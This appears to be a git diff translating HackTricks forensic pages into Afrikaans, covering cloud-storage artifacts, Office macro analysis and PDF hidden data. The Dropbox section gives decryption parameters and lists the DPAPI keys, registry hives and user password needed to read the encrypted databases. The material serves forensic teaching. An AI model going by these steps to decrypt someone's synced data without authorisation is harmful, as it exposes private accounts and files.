+Dim oTxtStream - On Error Resume Next - Set oTxtStream = oFSO.createTextFile(strPath) +On Error Resume Next +Set oTxtStream = oFSO.createTextFile(strPath) - If Err.number <> 0 Then MsgBox(Err.message) : Exit Function - On Error GoTo 0 +If Err.number <> 0 Then MsgBox(Err.message) : Exit Function +On Error GoTo 0 - Set oTxtStream = Nothing - ' end check of write access +Set oTxtStream = Nothing +' end check of write access - With oFSO.createTextFile(strPath) - .Write(strBinary) - .Close - End With +With oFSO.createTextFile(strPath) +.Write(strBinary) +.Close +End With End Function ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md index 4359365c5..756c77de3 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md @@ -1,138 +1,136 @@ -# Local Cloud Storage +# Plaaslike Wolklêerstoor
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## OneDrive -In Windows, you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive`. And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files: +In Windows kan jy die OneDrive-vouer vind in `\Users\\AppData\Local\Microsoft\OneDrive`. En binne `logs\Personal` is dit moontlik om die lêer `SyncDiagnostics.log` te vind wat interessante data bevat oor die gesinkroniseerde lêers: -* Size in bytes -* Creation date -* Modification date -* Number of files in the cloud -* Number of files in the folder -* **CID**: Unique ID of the OneDrive user -* Report generation time -* Size of the HD of the OS +* Grootte in bytes +* Skeppingsdatum +* Wysigingsdatum +* Aantal lêers in die wolk +* Aantal lêers in die vouer +* **CID**: Unieke ID van die OneDrive-gebruiker +* Verslaggenereringstyd +* Grootte van die bedryfstelsel se harde skyf -Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\.ini**_ and _**\.dat**_ that may contain interesting information like the names of files synchronized with OneDrive. +Nadat jy die CID gevind het, word dit aanbeveel om **lêers te soek wat hierdie ID bevat**. 
Jy kan lêers met die naam vind: _**\.ini**_ en _**\.dat**_ wat interessante inligting kan bevat, soos die name van lêers wat met OneDrive gesinkroniseer is. ## Google Drive -In Windows, you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default`\ -This folder contains a file called Sync\_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files, etc. Even deleted files appear in that log file with its corresponding MD5. +In Windows kan jy die hoof Google Drive-vouer vind in `\Users\\AppData\Local\Google\Drive\user_default`\ +Hierdie vouer bevat 'n lêer genaamd Sync\_log.log met inligting soos die e-posadres van die rekening, lêernaam, tydstempels, MD5-hashes van die lêers, ens. Selfs uitgevee lêers verskyn in daardie loglêer met die ooreenstemmende MD5. -The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`**. In this table you can find the **name** of the **synchronized** **files**, modified time, size, and the MD5 checksum of the files. +Die lêer **`Cloud_graph\Cloud_graph.db`** is 'n sqlite-databasis wat die tabel **`cloud_graph_entry`** bevat. In hierdie tabel kan jy die **naam** van die **gesinkroniseerde** **lêers**, gewysigde tyd, grootte en die MD5-kontrolegetal van die lêers vind. -The table data of the database **`Sync_config.db`** contains the email address of the account, the path of the shared folders and the Google Drive version. +Die tabeldata van die databasis **`Sync_config.db`** bevat die e-posadres van die rekening, die pad van die gedeelde vouers en die Google Drive-weergawe. ## Dropbox -Dropbox uses **SQLite databases** to manage the files. In this\ -You can find the databases in the folders: +Dropbox gebruik **SQLite-databasisse** om die lêers te bestuur. 
In hierdie\ +Jy kan die databasisse in die volgende vouers vind: -* `\Users\\AppData\Local\Dropbox` -* `\Users\\AppData\Local\Dropbox\Instance1` -* `\Users\\AppData\Roaming\Dropbox` +* `\Users\\AppData\Local\Dropbox` +* `\Users\\AppData\Local\Dropbox\Instance1` +* `\Users\\AppData\Roaming\Dropbox` -And the main databases are: +En die belangrikste databasisse is: * Sigstore.dbx * Filecache.dbx * Deleted.dbx * Config.dbx -The ".dbx" extension means that the **databases** are **encrypted**. Dropbox uses **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN)) +Die ".dbx"-uitbreiding beteken dat die **databasisse** **gekripteer** is. Dropbox gebruik **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN)) -To understand better the encryption that Dropbox uses you can read [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html). +Om die kriptering wat Dropbox gebruik beter te verstaan, kan jy lees [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html). 
-However, the main information is: +Die belangrikste inligting is egter: -* **Entropy**: d114a55212655f74bd772e37e64aee9b -* **Salt**: 0D638C092E8B82FC452883F95F355B8E -* **Algorithm**: PBKDF2 -* **Iterations**: 1066 +* **Entropie**: d114a55212655f74bd772e37e64aee9b +* **Sout**: 0D638C092E8B82FC452883F95F355B8E +* **Algoritme**: PBKDF2 +* **Iterasies**: 1066 -Apart from that information, to decrypt the databases you still need: +Afgesien van daardie inligting, om die databasisse te ontsluit, het jy steeds nodig: -* The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary) -* The **`SYSTEM`** and **`SECURITY`** hives -* The **DPAPI master keys**: Which can be found in `\Users\\AppData\Roaming\Microsoft\Protect` -* The **username** and **password** of the Windows user +* Die **gekripteerde DPAPI-sleutel**: Jy kan dit in die register vind binne `NTUSER.DAT\Software\Dropbox\ks\client` (voer hierdie data uit as binêr) +* Die **`SYSTEM`** en **`SECURITY`**-bytjies +* Die **DPAPI-hoofsleutels**: Wat gevind kan word in `\Users\\AppData\Roaming\Microsoft\Protect` +* Die **gebruikersnaam** en **wagwoord** van die Windows-gebruiker -Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)**:** +Dan kan jy die instrument [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)** gebruik:** ![](<../../../.gitbook/assets/image (448).png>) -If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt. 
- -The resulting hex is the final key used to encrypt the databases which can be decrypted with: +As alles soos verwag verloop, sal die instrument die **primêre sleutel** aandui wat jy moet **gebruik om die oorspronklike sleutel te herstel**. Om die oorspronklike sleutel te herstel, gebruik jy net hierdie [cyber\_chef-resep](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) en plaas die primêre sleutel as die "wagwoord" binne die resep. +Die resulterende heks is die finale sleutel wat gebruik word om die databasisse te kripteer, wat ontsluit kan word met: ```bash sqlite -k config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db ``` +Die **`config.dbx`** databasis bevat: -The **`config.dbx`** database contains: +* **E-pos**: Die e-pos van die gebruiker +* **usernamedisplayname**: Die naam van die gebruiker +* **dropbox\_path**: Pad waar die Dropbox-lys geleë is +* **Host\_id: Hash** wat gebruik word om te verifieer by die wolk. Dit kan slegs vanaf die web herroep word. +* **Root\_ns**: Gebruikersidentifiseerder -* **Email**: The email of the user -* **usernamedisplayname**: The name of the user -* **dropbox\_path**: Path where the dropbox folder is located -* **Host\_id: Hash** used to authenticate to the cloud. This can only be revoked from the web. -* **Root\_ns**: User identifier +Die **`filecache.db`** databasis bevat inligting oor al die lêers en vouers wat met Dropbox gesinchroniseer is. Die tabel `File_journal` bevat die meeste nuttige inligting: -The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. 
The table `File_journal` is the one with more useful information: +* **Server\_path**: Pad waar die lêer binne die bediener geleë is (hierdie pad word voorafgegaan deur die `host_id` van die kliënt). +* **local\_sjid**: Weergawe van die lêer +* **local\_mtime**: Wysigingsdatum +* **local\_ctime**: Skeppingsdatum -* **Server\_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client). -* **local\_sjid**: Version of the file -* **local\_mtime**: Modification date -* **local\_ctime**: Creation date +Ander tabelle binne hierdie databasis bevat meer interessante inligting: -Other tables inside this database contain more interesting information: - -* **block\_cache**: hash of all the files and folders of Dropbox -* **block\_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal` -* **mount\_table**: Share folders of dropbox -* **deleted\_fields**: Dropbox deleted files +* **block\_cache**: hash van al die lêers en vouers van Dropbox +* **block\_ref**: Verbind die hash-ID van die tabel `block_cache` met die lêer-ID in die tabel `file_journal` +* **mount\_table**: Deel vouers van Dropbox +* **deleted\_fields**: Dropbox verwyderde lêers * **date\_added**
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 4dced7582..4794c117e 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -1,63 +1,58 @@ -# Office file analysis +# Kantoorlêer-ontleding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary: +Vir verdere inligting, kyk na [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). Dit is net 'n opsomming: +Microsoft het baie kantoorlêer-formate geskep, met twee hooftipes, naamlik **OLE-formate** (soos RTF, DOC, XLS, PPT) en **Office Open XML (OOXML) formate** (soos DOCX, XLSX, PPTX). Hierdie formate kan makros insluit, wat hulle teikens maak vir hengel en kwaadwillige sagteware. OOXML-lêers is gestruktureer as zip-houers, wat inspeksie deur middel van uitpakkery moontlik maak, waar die lêer- en vouerhiërargie en XML-lêerinhoude onthul word. -Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents. +Om OOXML-lêerstrukture te verken, word die opdrag om 'n dokument uit te pak en die uitsetstruktuur gegee. Tegnieke vir die versteek van data in hierdie lêers is gedokumenteer, wat voortdurende innovasie in data-versteek binne CTF-uitdagings aandui. 
-To explore OOXML file structures, the command to unzip a document and the output structure are given. Techniques for hiding data in these files have been documented, indicating ongoing innovation in data concealment within CTF challenges. - -For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables. - -Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`. +Vir ontleding bied **oletools** en **OfficeDissector** omvattende gereedskapstelle vir die ondersoek van beide OLE- en OOXML-dokumente. Hierdie gereedskap help om ingebedde makros te identifiseer en te analiseer, wat dikwels as vektore vir kwaadwillige sagteware-aflewering dien, wat tipies aanvullende skadelike lading aflaai en uitvoer. Analise van VBA-makros kan uitgevoer word sonder Microsoft Office deur gebruik te maak van Libre Office, wat voorsiening maak vir foutopsporing met breekpunte en kykveranderlikes. +Die installasie en gebruik van **oletools** is eenvoudig, met opdragte wat voorsien word vir installasie via pip en die onttrekking van makros uit dokumente. Outomatiese uitvoering van makros word geaktiveer deur funksies soos `AutoOpen`, `AutoExec`, of `Document_Open`. ```bash sudo pip3 install -U oletools olevba -c /path/to/document #Extract macros ``` - -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md index 4a0a11bae..e018c967f 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md @@ -1,52 +1,52 @@ -# PDF File analysis +# PDF-lêerontleding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -**For further details check: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)** +**Vir verdere besonderhede, kyk na: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)** -The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami. +Die PDF-formaat is bekend vir sy kompleksiteit en potensiaal om data te verberg, wat dit 'n fokuspunt maak vir CTF-forensiese uitdagings. Dit kombineer plain-tekstelemente met binêre voorwerpe, wat moontlik saamgedruk of versleutel kan wees, en kan skripte in tale soos JavaScript of Flash insluit. 
Om die PDF-struktuur te verstaan, kan verwys word na Didier Stevens se [inleidende materiaal](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), of gebruik maak van hulpmiddels soos 'n teksredigeerder of 'n PDF-spesifieke redigeerder soos Origami. -For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://github.com/qpdf/qpdf) and [Origami](https://github.com/mobmewireless/origami-pdf) are available. Hidden data within PDFs might be concealed in: +Vir diepgaande verkenning of manipulasie van PDF's is hulpmiddels soos [qpdf](https://github.com/qpdf/qpdf) en [Origami](https://github.com/mobmewireless/origami-pdf) beskikbaar. Versteekte data binne PDF's kan verskuil wees in: -* Invisible layers -* XMP metadata format by Adobe -* Incremental generations -* Text with the same color as the background -* Text behind images or overlapping images -* Non-displayed comments +* Onsigbare lae +* XMP-metadata-formaat deur Adobe +* Inkrementele generasies +* Teks met dieselfde kleur as die agtergrond +* Teks agter beelde of oorvleuelende beelde +* Nie-vertoonde kommentaar -For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject. +Vir aangepaste PDF-ontleding kan Python-biblioteke soos [PeepDF](https://github.com/jesparza/peepdf) gebruik word om spesiale ontledingsskripte te skep. 
Verder is die potensiaal van die PDF vir versteekte data-opberging so groot dat bronne soos die NSA-gids oor PDF-risiko's en teenmaatreëls, alhoewel dit nie meer by sy oorspronklike plek gehuisves word nie, steeds waardevolle insigte bied. 'n [Afskrif van die gids](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) en 'n versameling [PDF-formaat-truuks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) deur Ange Albertini kan verdere leesstof oor die onderwerp bied.
